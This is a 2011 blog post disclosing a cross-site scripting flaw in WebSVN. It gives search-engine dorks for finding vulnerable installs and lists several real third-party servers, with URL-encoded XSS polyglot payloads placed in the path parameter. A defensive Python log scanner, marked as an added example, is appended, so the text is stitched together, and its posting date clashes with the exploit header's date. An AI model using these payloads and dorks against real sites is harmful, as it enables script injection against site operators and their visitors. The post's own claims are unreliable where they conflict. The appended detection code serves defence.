Saturday, 17 December 2011

WebSVN Cross Site Scripting

# Exploit Title: WebSVN Cross Site Scripting
# Date: 24.12.2011
# Author: Sony
# Software Link: http://websvn.tigris.org/
# Google Dorks: inurl:/svn/listing.php?repname= or intext:"Powered by WebSVN"
# Version: ???
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
..................................................................

Demo:

We have some code (oh, ugly code):

http://codepad.org/pVCU96rQ

http://lostsidedead.com/svn/comp.php?repname=haze&path=&

Put our code in the "With Path:" field and press Enter. Or open http://lostsidedead.com/svn/, click on afftol and then on Compare Paths.


http://svn.suretecsystems.com/svn/comp.php?repname=aberdeen.pm&path=&

http://ciclope.fi.upm.es/svn/comp.php?repname=Ciclope+SVN&path=&

http://sheelabs.gamemod.net/svn/comp.php?repname=sheelabs&path=&

http://dev-svn.seasr.org/WebSVN/comp.php?repname=Components&path=%2F&

or:

http://code.clearfoundation.com/svn/revision.php?repname=l7-filter&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&rev=324&peg=324

http://vector.ucsd.edu/svn/comp.php?repname=vector&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

or

http://christianserving.org/websvn/diff.php?repname=TruePreview&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

Video: (because it's a specific XSS)
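
A defensive check for the request pattern in the URLs above, as an added example that is not part of the original post: it scans web-server access-log lines for requests to comp.php, revision.php or diff.php whose decoded `path` parameter contains markup characters. The combined log format, the sample lines and the function names are assumptions constructed for illustration; the character test is a heuristic and can flag legitimate file names containing quotes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts that appear in the post's URLs with a reflected `path` parameter.
WEBSVN_SCRIPTS = {"comp.php", "revision.php", "diff.php"}
# Heuristic: characters rarely found in repository paths but needed for HTML injection.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access-log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_path(request_target):
    """Return the decoded `path` value if it carries markup, else None."""
    parts = urlsplit(request_target)
    if parts.path.rsplit("/", 1)[-1] not in WEBSVN_SCRIPTS:
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        if MARKUP.search(value):
            return value
    return None

def scan(log_lines):
    """Yield (line_number, decoded_path) for each flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            hit = suspicious_path(match.group(1))
            if hit is not None:
                yield number, hit

# Constructed sample log: documentation addresses, benign marker values.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Dec/2011:10:00:01 +0000] "GET /svn/comp.php?repname=demo&path=%2Ftrunk%2F HTTP/1.1" 200 5120',
    '192.0.2.11 - - [17/Dec/2011:10:00:07 +0000] "GET /svn/comp.php?repname=demo&path=%2F%3Cb%3Emarker%3C%2Fb%3E HTTP/1.1" 200 5333',
    '192.0.2.11 - - [17/Dec/2011:10:00:09 +0000] "GET /svn/listing.php?repname=demo&path=%2F%3Cb%3E HTTP/1.1" 200 4100',
    '192.0.2.12 - - [17/Dec/2011:10:00:15 +0000] "GET /websvn/diff.php?repname=demo&path=%2Fa%22+x%3D%221 HTTP/1.1" 200 2900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: path={value!r}")
```

Values submitted in a POST body do not appear in an access log, so this only covers the GET form of the requests shown in the post.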
